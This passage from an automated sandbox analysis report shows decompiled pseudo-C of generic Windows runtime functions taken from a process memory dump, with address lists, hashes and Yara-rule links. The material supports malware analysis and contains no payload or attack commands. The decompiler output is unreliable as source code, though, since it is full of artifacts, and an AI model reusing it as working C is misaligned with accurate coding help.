					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					E0499AFDE( &_v12,  &_v16);
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					E0499BCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(E048F7D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v19;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						E0498FE3F(_t55, _t91, _v15, _t55);
					}
				} else {
					if(_t86 == 0) {
						E048EFFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E0499A80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}

0x0499ea55
0x0499ea66
0x0499ea68
0x0499ea6c
0x0499ea6f
0x0499ea72
0x0499ea75
0x0499ea7a
0x0499ea7a
0x0499ea7e
0x0499ea80
0x0499ea85
0x0499ea8b
0x0499eab5
0x0499eabc
0x0499eabf
0x0499eabf
0x0499eaca
0x0499eace
0x0499ead0
0x0499eae4
0x0499eaeb
0x0499eaf0
0x0499eaf5
0x0499eb09
0x0499eb0d
0x0499eb1d
0x0499eb2d
0x0499eb38
0x0499eb3d
0x0499eb41
0x0499eb4a
0x0499eb60
0x0499eb4c
0x0499eb52
0x0499eb59
0x0499eb59
0x0499eb68
0x0499eb71
0x0499eb71
0x0499ea8d
0x0499ea8f
0x0499ea92
0x0499ea97
0x0499ea97
0x0499ea9b
0x0499ea9c
0x0499ea9e
0x0499eaa6
0x0499eaa6
0x0499eb7e

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction ID: a5120d3080d172064e35441ac30fd362e23f188d0f4ef530d748cc7c14bb8285
Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction Fuzzy Hash: F4319272604705ABDB19DF29C880A6BB7EAFBC0214F044A2DE65687684EF31FC05C795

Uniqueness

Uniqueness Score: -1.00%

Function 049569A6, Relevance: .1, Instructions: 108
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E049569A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x49cd360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L048E6C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E04956BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E04919980() >= 0) {
							E048F2280(_t56, 0x49c8778);
							_t77 = 1;
							_t68 = 1;
							if( *0x49c8774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x49c8774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E048DB6F0(0x48bc338, 0x48bc288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E04919520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E049195D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E048EFFB0(_t68, _t77, 0x49c8778);
				}
				_pop(_t78);
				return E0491B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}

0x049569b5
0x049569be
0x049569c3
0x049569c9
0x049569cc
0x049569d1
0x049569d3
0x049569de
0x049569e1
0x049569ea
0x049569f6
0x049569fe
0x04956a13
0x04956a14
0x04956a15
0x04956a16
0x04956a1e
0x04956a26
0x04956a31
0x04956a36
0x04956a37
0x04956a40
0x04956a49
0x04956a4a
0x04956a53
0x04956a59
0x04956a5d
0x04956a5e
0x04956a64
0x04956a67
0x04956a6a
0x04956a6d
0x04956a70
0x04956a77
0x04956a7d
0x04956a86
0x04956a89
0x04956a9c
0x04956a9f
0x04956aa2
0x04956aa5
0x04956aaf
0x04956ab1
0x04956ab8
0x04956ab9
0x04956abb
0x04956abe
0x04956ac5
0x04956ac5
0x04956aaf
0x04956a40
0x04956a26
0x049569fe
0x04956ace
0x04956ad0
0x04956ad3
0x04956ad8
0x04956adf
0x04956adf
0x04956ae8
0x04956aef
0x04956aef
0x04956af9
0x04956b06

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95a11542559f36bd7870d2966c398c470b46a1e8178314935ada2b3ec191c303
Instruction ID: dc1707862ec8fd2dc87f5055b2539038c504aca508ff114735035500e90b4438
Opcode Fuzzy Hash: 95a11542559f36bd7870d2966c398c470b46a1e8178314935ada2b3ec191c303
Instruction Fuzzy Hash: 08415EB1D402089FEB14DFA5D940BFEBBF8EF88714F14852AE918E7250DB74A905CB51

Uniqueness

Uniqueness Score: -1.00%

Function 048D5210, Relevance: .1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E048D5210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E048D52A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E049195D0();
							L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E048EEB70(_t54, 0x49c79a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E049195D0();
								L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E048EEB70(_t54, 0x49c79a0);
						}
						return _t52;
					}
					L5:
					_t33 = E0491F3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E048EEB70(_t54, 0x49c79a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E049195D0();
							L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}

0x048d5220
0x048d5224
0x04930d13
0x04930d16
0x04930d19
0x048d522a
0x048d522a
0x048d522d
0x048d522d
0x048d5231
0x048d5235
0x048d5239
0x04930d5c
0x04930d62
0x00000000
0x00000000
0x04930d6a
0x04930d7b
0x04930d7f
0x04930d81
0x04930d84
0x04930d95
0x04930d95
0x04930d6c
0x04930d71
0x04930d71
0x04930d9a
0x00000000
0x048d524a
0x048d524a
0x048d5250
0x04930d24
0x04930d35
0x04930d39
0x04930d3b
0x04930d3e
0x04930d50
0x04930d50
0x04930d26
0x04930d2b
0x04930d2b
0x00000000
0x04930d55
0x048d5256
0x048d525b
0x048d5265
0x04930da7
0x048d526b
0x048d526e
0x048d5272
0x04930db1
0x04930db4
0x04930dc5
0x04930dc5
0x048d5272
0x048d5278
0x048d527e
0x048d528a
0x048d528c
0x048d528d
0x00000000
0x048d5280
0x048d5282
0x048d5288
0x048d529f
0x048d5292
0x00000000
0x048d5292
0x00000000
0x048d5288
0x048d527e

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c4d7efc1655909cc70a4125938f6c7894c275727ccbc61ca8d571f467050021
Instruction ID: 795a1acb90cca1bff8ee27a8a633bc4cf1aa055ba6e9653d5ba705aec1054102
Opcode Fuzzy Hash: 2c4d7efc1655909cc70a4125938f6c7894c275727ccbc61ca8d571f467050021
Instruction Fuzzy Hash: BC310331652705EBD7219F18C880B7677E9FF41765F104B3AE8269B1A4EB70F904CA91

Uniqueness

Uniqueness Score: -1.00%

Function 04913D43, Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04913D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E048E7B60(0, _t61, 0x48b11c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E048E7B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L048F4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}

0x04913d4c
0x04913d50
0x04913d55
0x04913d5e
0x0494e79a
0x00000000
0x0494e79a
0x04913d68
0x0494e789
0x04913d9d
0x04913da3
0x04913daf
0x04913db5
0x04913dbc
0x04913dc4
0x04913dc9
0x04913dce
0x0494e7ae
0x0494e7ae
0x04913dde
0x04913de2
0x04913de7
0x04913e0d
0x04913e13
0x04913e16
0x04913e1e
0x04913e25
0x04913e28
0x00000000
0x00000000
0x04913e2a
0x04913e2f
0x04913e37
0x04913e37
0x00000000
0x04913e37
0x04913e31
0x00000000
0x04913e31
0x04913e20
0x04913e20
0x04913e35
0x00000000
0x04913de9
0x04913de9
0x04913de9
0x04913dee
0x04913dfd
0x04913dff
0x04913e02
0x04913e05
0x04913e05
0x00000000
0x04913df0
0x04913de7
0x0494e78f
0x0494e794
0x04913d79
0x04913d84
0x04913d89
0x04913d8e
0x00000000
0x0494e7a4
0x04913d96
0x04913d9a
0x00000000
0x04913d9a
0x00000000
0x0494e794
0x04913d6e
0x04913d73
0x00000000
0x0494e7b5
0x00000000

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08d59ffde8b0946674c84d33d01bc4b4f63f22164810585e620db60146f254e1
Instruction ID: d470aa46ef4813b3b8036b8f91dc904d316406bcbbc267d39d8ea8f52bc4337b
Opcode Fuzzy Hash: 08d59ffde8b0946674c84d33d01bc4b4f63f22164810585e620db60146f254e1
Instruction Fuzzy Hash: 8131AF35B00619DBEB348F29C885A7ABBB9EF95710B05847AE845CB360E630E841D791

Uniqueness

Uniqueness Score: -1.00%

Function 04957016, Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E04957016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x49cd360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E04956B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E04956B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E048F7D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E04919AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E0491B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L048F4620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}

0x04957016
0x0495701e
0x0495702b
0x04957033
0x04957037
0x0495703c
0x0495703e
0x04957041
0x04957045
0x0495704a
0x04957050
0x04957055
0x0495705a
0x04957062
0x04957062
0x0495705a
0x04957064
0x04957064
0x04957067
0x04957071
0x04957096
0x0495709b
0x049570a2
0x049570a6
0x049570a7
0x049570ad
0x049570b3
0x049570b6
0x049570bb
0x049570c3
0x049570c3
0x049570c6
0x049570cd
0x049570dd
0x049570e0
0x049570e2
0x049570e2
0x049570ee
0x04957101
0x049570f0
0x049570f9
0x049570f9
0x0495710a
0x0495710e
0x04957112
0x04957117
0x04957118
0x04957118
0x049570bb
0x0495711d
0x04957123
0x04957131
0x04957131
0x04957136
0x0495713d
0x0495713e
0x0495713f
0x0495714a
0x0495714a
0x04957084
0x04957088
0x00000000
0x0495708e
0x0495708e
0x04957092
0x00000000
0x04957092

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32a6110a8895c71d4508b2f14718db7e9134ebe2d1dede3aeec8a4226dea9aef
Instruction ID: ed2b403f8b4c01ad320811c90fb9cd16dc28db4a3ee06a22cf36082801fa897e
Opcode Fuzzy Hash: 32a6110a8895c71d4508b2f14718db7e9134ebe2d1dede3aeec8a4226dea9aef
Instruction Fuzzy Hash: CC31A3726087519FD320DF68C940E6AB7E9BFC8700F144A69FC95876A0E730FA04C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 048FC182, Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E048FC182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E048F7D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E049A8D34(_v8, _t80);
					}
					E048F2280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E048EFFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E049A8833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E048EFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E0491B180();
						if(_a4 != 0) {
							E048F2280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E048FBB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E048FBB2D(_t16, _t15);
						E048FB944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E048EFFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E048EFFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E048EFFB0(0, __ecx, _t24);
				}
				return 0;
			}

0x048fc18d
0x048fc18f
0x048fc191
0x048fc19b
0x048fc1a0
0x048fc1d4
0x048fc1de
0x04942d6e
0x048fc1e4
0x048fc1e4
0x048fc1e4
0x048fc1ec
0x04942d7d
0x04942d7d
0x048fc1f3
0x048fc1ff
0x04942d88
0x04942d8d
0x04942d94
0x04942d94
0x04942d9f
0x04942da4
0x04942dab
0x04942db0
0x04942db2
0x04942db3
0x04942db4
0x04942dbc
0x04942dc3
0x04942dc3
0x048fc205
0x048fc205
0x048fc208
0x048fc20e
0x048fc211
0x048fc216
0x048fc219
0x048fc21f
0x048fc222
0x048fc22c
0x048fc234
0x048fc23a
0x048fc23f
0x048fc245
0x048fc24b
0x048fc251
0x048fc25a
0x048fc276
0x048fc27d
0x048fc27d
0x048fc25c
0x048fc25c
0x00000000
0x048fc25e
0x048fc1a4
0x048fc1aa
0x048fc1b3
0x048fc265
0x048fc26c
0x048fc26c
0x00000000

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction ID: 26d3c50acbb09759ee64495e59093f238e69054995152c2a069d72d3b6d87b2b
Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction Fuzzy Hash: 22314671B0154EBEE704EBF8C880BE9F758BF82208F044A6AD618C7241DB747A55D7A2

Uniqueness

Uniqueness Score: -1.00%

Function 04916DE6, Relevance: .1, Instructions: 101
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E04916DE6(signed int __ecx, void* __edx, signed int _a4, intOrPtr* _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t39;
				intOrPtr _t52;
				intOrPtr _t53;
				signed int _t59;
				signed int _t63;
				intOrPtr _t64;
				intOrPtr* _t66;
				void* _t68;
				intOrPtr _t69;
				signed int _t73;
				signed int _t75;
				intOrPtr _t77;
				signed int _t80;
				intOrPtr _t82;

				_t68 = __edx;
				_push(__ecx);
				_t80 = __ecx;
				_t75 = _a4;
				if(__edx >  *((intOrPtr*)(__ecx + 0x90))) {
					L23:
					asm("lock inc dword [esi+0x110]");
					if(( *(_t80 + 0xd4) & 0x00010000) != 0) {
						asm("lock inc dword [ecx+eax+0x4]");
					}
					_t39 = 0;
					L13:
					return _t39;
				}
				_t63 =  *(__ecx + 0x88);
				_t4 = _t68 + 7; // 0xa
				_t69 =  *((intOrPtr*)(__ecx + 0x8c));
				_t59 = _t4 & 0xfffffff8;
				_v8 = _t69;
				if(_t75 >= _t63) {
					_t75 = _t75 % _t63;
					L15:
					_t69 = _v8;
				}
				_t64 =  *((intOrPtr*)(_t80 + 0x17c + _t75 * 4));
				if(_t64 == 0) {
					L14:
					if(E04916EBE(_t80, _t64, _t75) != 1) {
						goto L23;
					}
					goto L15;
				}
				asm("lock inc dword [ecx+0xc]");
				if( *((intOrPtr*)(_t64 + 0x2c)) != 1 ||  *((intOrPtr*)(_t64 + 8)) > _t69) {
					goto L14;
				} else {
					_t73 = _t59;
					asm("lock xadd [eax], edx");
					if(_t73 + _t59 > _v8) {
						if(_t73 <= _v8) {
							 *(_t64 + 4) = _t73;
						}
						goto L14;
					}
					_t77 = _t73 + _t64;
					_v8 = _t77;
					 *_a12 = _t64;
					_t66 = _a8;
					if(_t66 == 0) {
						L12:
						_t39 = _t77;
						goto L13;
					}
					_t52 =  *((intOrPtr*)(_t80 + 0x10));
					if(_t52 != 0) {
						_t53 = _t52 - 1;
						if(_t53 == 0) {
							asm("rdtsc");
							 *_t66 = _t53;
							L11:
							 *(_t66 + 4) = _t73;
							goto L12;
						}
						E04906A60(_t66);
						goto L12;
					}
					while(1) {
						_t73 =  *0x7ffe0018;
						_t82 =  *0x7FFE0014;
						if(_t73 ==  *0x7FFE001C) {
							break;
						}
						asm("pause");
					}
					_t66 = _a8;
					_t77 = _v8;
					 *_t66 = _t82;
					goto L11;
				}
			}

0x04916de6
0x04916dee
0x04916df1
0x04916df4
0x04916dfd
0x049505d3
0x049505d3
0x049505e4
0x049505f9
0x049505f9
0x049505fe
0x04916e96
0x04916e9c
0x04916e9c
0x04916e03
0x04916e09
0x04916e0c
0x04916e12
0x04916e15
0x04916e1b
0x049505a1
0x04916eb1
0x04916eb1
0x04916eb1
0x04916e21
0x04916e2a
0x04916e9f
0x04916eab
0x00000000
0x00000000
0x00000000
0x04916eab
0x04916e2c
0x04916e34
0x00000000
0x04916e3d
0x04916e3d
0x04916e42
0x04916e4d
0x049505ac
0x049505b2
0x049505b2
0x00000000
0x049505ac
0x04916e56
0x04916e59
0x04916e5d
0x04916e5f
0x04916e64
0x04916e94
0x04916e94
0x00000000
0x04916e94
0x04916e6a
0x04916e6d
0x049505ba
0x049505bd
0x049505ca
0x049505cc
0x04916e91
0x04916e91
0x00000000
0x04916e91
0x049505c0
0x00000000
0x049505c0
0x04916e7e
0x04916e7e
0x04916e80
0x04916e86
0x00000000
0x00000000
0x04916eba
0x04916eba
0x04916e88
0x04916e8b
0x04916e8f
0x00000000
0x04916e8f

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f5923ccfc62e11761a64181f477a9fcd764954153fe337c5a9bd4bea8846838
Instruction ID: aa35332cc787262b5b50c09f526f2f47e330b9fc73cc7365ca009b8c12bd588b
Opcode Fuzzy Hash: 8f5923ccfc62e11761a64181f477a9fcd764954153fe337c5a9bd4bea8846838
Instruction Fuzzy Hash: D0314031604609DFC724CF29C484A6EB7A6FFC6315B24CA6DE45A8B265DB31FC52CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04983D40, Relevance: .1, Instructions: 98
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E04983D40(intOrPtr __ecx, char* __edx) {
				signed int _v8;
				char* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed char _v24;
				char _v28;
				char _v29;
				intOrPtr* _v32;
				char _v36;
				char _v37;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char _t34;
				intOrPtr* _t37;
				intOrPtr* _t42;
				intOrPtr* _t47;
				intOrPtr* _t48;
				intOrPtr* _t49;
				char _t51;
				void* _t52;
				intOrPtr* _t53;
				char* _t55;
				char _t59;
				char* _t61;
				intOrPtr* _t64;
				void* _t65;
				char* _t67;
				void* _t68;
				signed int _t70;

				_t62 = __edx;
				_t72 = (_t70 & 0xfffffff8) - 0x1c;
				_v8 =  *0x49cd360 ^ (_t70 & 0xfffffff8) - 0x0000001c;
				_t34 =  &_v28;
				_v20 = __ecx;
				_t67 = __edx;
				_v24 = _t34;
				_t51 = 0;
				_v12 = __edx;
				_v29 = 0;
				_v28 = _t34;
				E048F2280(_t34, 0x49c8a6c);
				_t64 =  *0x49c5768; // 0x77f05768
				if(_t64 != 0x49c5768) {
